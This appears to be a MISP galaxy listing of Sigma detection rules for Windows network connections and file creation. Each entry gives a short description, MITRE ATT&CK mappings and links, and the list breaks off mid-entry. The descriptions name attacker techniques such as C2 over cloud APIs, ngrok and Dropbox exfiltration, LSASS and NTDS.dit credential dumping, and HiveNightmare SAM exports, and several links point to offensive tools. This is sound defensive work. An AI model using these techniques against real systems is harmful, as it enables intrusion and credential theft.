https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml

Potentially Suspicious Network Connection To Notion API

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Network Connection To Notion API"

Potentially Suspicious Network Connection To Notion API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9859. Table References

Links

https://github.com/mttaggart/OffensiveNotion

https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml

Network Connection Initiated Via Notepad.EXE

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated Via Notepad.EXE"

Network Connection Initiated Via Notepad.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9860. Table References

Links

https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet

https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad.yml

Suspicious Non-Browser Network Communication With Google API

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

The tag is: misp-galaxy:sigma-rules="Suspicious Non-Browser Network Communication With Google API"

Suspicious Non-Browser Network Communication With Google API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9861. Table References

Links

https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/

https://youtu.be/n2dFlSaBBKo

https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/

https://github.com/looCiprian/GC2-sheet

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_google_api_non_browser_access.yml

Network Connection Initiated By IMEWDBLD.EXE

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By IMEWDBLD.EXE"

Network Connection Initiated By IMEWDBLD.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9862. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml

Network Connection Initiated To Mega.nz

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To Mega.nz"

Network Connection Initiated To Mega.nz has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9863. Table References

Links

https://www.mandiant.com/resources/russian-targeting-gov-business

https://megatools.megous.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_mega_nz.yml

Dllhost.EXE Initiated Network Connection To Non-Local IP Address

Detects dllhost initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.

The tag is: misp-galaxy:sigma-rules="Dllhost.EXE Initiated Network Connection To Non-Local IP Address"

Dllhost.EXE Initiated Network Connection To Non-Local IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

Table 9864. Table References

Links

https://redcanary.com/blog/child-processes/

https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml

Cmstp Making Network Connection

Detects suspicious network connection by Cmstp

The tag is: misp-galaxy:sigma-rules="Cmstp Making Network Connection"

Cmstp Making Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9865. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml

Equation Editor Network Connection

Detects network connections from Equation Editor

The tag is: misp-galaxy:sigma-rules="Equation Editor Network Connection"

Equation Editor Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 9866. Table References

Links

https://twitter.com/forensicitguy/status/1513538712986079238

https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml

Potentially Suspicious Malware Callback Communication

Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Malware Callback Communication"

Potentially Suspicious Malware Callback Communication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9867. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml

Suspicious Network Connection to IP Lookup Service APIs

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

The tag is: misp-galaxy:sigma-rules="Suspicious Network Connection to IP Lookup Service APIs"

Suspicious Network Connection to IP Lookup Service APIs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 9868. Table References

Links

https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml

Communication To Ngrok Tunneling Service Initiated

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

The tag is: misp-galaxy:sigma-rules="Communication To Ngrok Tunneling Service Initiated"

Communication To Ngrok Tunneling Service Initiated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9869. Table References

Links

https://twitter.com/hakluke/status/1587733971814977537/photo/1

https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml

Suspicious Dropbox API Usage

Detects an executable that isn’t dropbox but communicates with the Dropbox API

The tag is: misp-galaxy:sigma-rules="Suspicious Dropbox API Usage"

Suspicious Dropbox API Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9870. Table References

Links

https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east

https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml

Process Initiated Network Connection To Ngrok Domain

Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.

The tag is: misp-galaxy:sigma-rules="Process Initiated Network Connection To Ngrok Domain"

Process Initiated Network Connection To Ngrok Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9871. Table References

Links

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf

https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/

https://ngrok.com/blog-post/new-ngrok-domains

https://ngrok.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok.yml

Potential Dead Drop Resolvers

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.

The tag is: misp-galaxy:sigma-rules="Potential Dead Drop Resolvers"

Potential Dead Drop Resolvers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

Table 9872. Table References

Links

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://twitter.com/kleiton0x7e/status/1600567316810551296

https://github.com/kleiton0x00/RedditC2

https://content.fireeye.com/apt-41/rpt-apt41

https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al

https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dead_drop_resolvers.yml

Microsoft Binary Suspicious Communication Endpoint

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

The tag is: misp-galaxy:sigma-rules="Microsoft Binary Suspicious Communication Endpoint"

Microsoft Binary Suspicious Communication Endpoint has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9873. Table References

Links

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://twitter.com/M_haggis/status/900741347035889665

https://twitter.com/M_haggis/status/1032799638213066752

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml

Potential Privilege Escalation Attempt Via .Exe.Local Technique

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation Attempt Via .Exe.Local Technique"

Table 9874. Table References

Links

https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml

Self Extraction Directive File Created In Potentially Suspicious Location

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

The tag is: misp-galaxy:sigma-rules="Self Extraction Directive File Created In Potentially Suspicious Location"

Self Extraction Directive File Created In Potentially Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9875. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml

LSASS Process Memory Dump Files

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

The tag is: misp-galaxy:sigma-rules="LSASS Process Memory Dump Files"

LSASS Process Memory Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9876. Table References

Links

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://www.google.com/search?q=procdump+lsass

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml

https://github.com/CCob/MirrorDump

https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml

VHD Image Download Via Browser

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

The tag is: misp-galaxy:sigma-rules="VHD Image Download Via Browser"

VHD Image Download Via Browser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9877. Table References

Links

https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://redcanary.com/blog/intelligence-insights-october-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

The tag is: misp-galaxy:sigma-rules="LiveKD Driver Creation By Uncommon Process"

Table 9878. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml

NTDS.DIT Creation By Uncommon Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Creation By Uncommon Process"

NTDS.DIT Creation By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9879. Table References

Links

https://adsecurity.org/?p=2398

https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml

Typical HiveNightmare SAM File Export

Detects files written by the different tools that exploit HiveNightmare

The tag is: misp-galaxy:sigma-rules="Typical HiveNightmare SAM File Export"

Typical HiveNightmare SAM File Export has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9880. Table References

Links

https://github.com/WiredPulse/Invoke-HiveNightmare

https://github.com/GossiTheDog/HiveNightmare

https://github.com/FireFart/hivenightmare/

https://twitter.com/cube0x0/status/1418920190759378944

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml

PowerShell Module File Created

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

The tag is: misp-galaxy:sigma-rules="PowerShell Module File Created"

Table 9881. Table References

Links

Internal Research[Internal Research]

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml

Suspicious Outlook Macro Created

Detects the creation of a macro file for Outlook.

The tag is: misp-galaxy:sigma-rules="Suspicious Outlook Macro Created"

Suspicious Outlook Macro Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9882. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

The tag is: misp-galaxy:sigma-rules="Suspicious LNK Double Extension File Created"

Suspicious LNK Double Extension File Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 9883. Table References

Links

https://twitter.com/luc4m/status/1073181154126254080

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles

https://twitter.com/malwrhunterteam/status/1235135745611960321

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml

Suspicious Creation TXT File in User Desktop

Ransomware create txt file in the user Desktop

The tag is: misp-galaxy:sigma-rules="Suspicious Creation TXT File in User Desktop"

Suspicious Creation TXT File in User Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 9884. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml

Creation of a Diagcab

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

The tag is: misp-galaxy:sigma-rules="Creation of a Diagcab"

Table 9886. Table References

Links

https://threadreaderapp.com/thread/1533879688141086720.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml

VsCode Powershell Profile Modification

Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

The tag is: misp-galaxy:sigma-rules="VsCode Powershell Profile Modification"

VsCode Powershell Profile Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9887. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml

Suspicious PROCEXP152.sys File Created In TMP

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

The tag is: misp-galaxy:sigma-rules="Suspicious PROCEXP152.sys File Created In TMP"

Suspicious PROCEXP152.sys File Created In TMP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9888. Table References

Links

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml

OneNote Attachment File Dropped In Suspicious Location

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

The tag is: misp-galaxy:sigma-rules="OneNote Attachment File Dropped In Suspicious Location"

Table 9889. Table References

Links

https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/

https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml

NTDS.DIT Creation By Uncommon Parent Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Creation By Uncommon Parent Process"

NTDS.DIT Creation By Uncommon Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9891. Table References

Links

https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1

https://pentestlab.blog/tag/ntds-dit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml

ADSI-Cache File Creation By Uncommon Tool

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

The tag is: misp-galaxy:sigma-rules="ADSI-Cache File Creation By Uncommon Tool"

ADSI-Cache File Creation By Uncommon Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

Table 9892. Table References

Links

https://github.com/fox-it/LDAPFragger

https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml

PSEXEC Remote Execution File Artefact

Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

The tag is: misp-galaxy:sigma-rules="PSEXEC Remote Execution File Artefact"

PSEXEC Remote Execution File Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

Table 9893. Table References

Links

https://twitter.com/davisrichardg/status/1616518800584704028

https://aboutdfir.com/the-key-to-identify-psexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml

Suspicious File Creation In Uncommon AppData Folder

Detects the creation of suspicious files and folders inside the user’s AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs

The tag is: misp-galaxy:sigma-rules="Suspicious File Creation In Uncommon AppData Folder"

Table 9894. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml

Suspicious Double Extension Files

Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.

The tag is: misp-galaxy:sigma-rules="Suspicious Double Extension Files"

Suspicious Double Extension Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 9895. Table References

Links

https://twitter.com/luc4m/status/1073181154126254080

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles

https://twitter.com/malwrhunterteam/status/1235135745611960321

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml

Suspicious Files in Default GPO Folder

Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder

The tag is: misp-galaxy:sigma-rules="Suspicious Files in Default GPO Folder"

Suspicious Files in Default GPO Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 9896. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml

Process Explorer Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.

The tag is: misp-galaxy:sigma-rules="Process Explorer Driver Creation By Non-Sysinternals Binary"

Process Explorer Driver Creation By Non-Sysinternals Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9897. Table References

Links

https://github.com/Yaxser/Backstab

https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml

Creation Exe for Service with Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

The tag is: misp-galaxy:sigma-rules="Creation Exe for Service with Unquoted Path"

Creation Exe for Service with Unquoted Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9898. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml

GoToAssist Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="GoToAssist Temporary Installation Artefact"

GoToAssist Temporary Installation Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9899. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml

Potential Remote Credential Dumping Activity

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

The tag is: misp-galaxy:sigma-rules="Potential Remote Credential Dumping Activity"

Potential Remote Credential Dumping Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9900. Table References

Links

https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

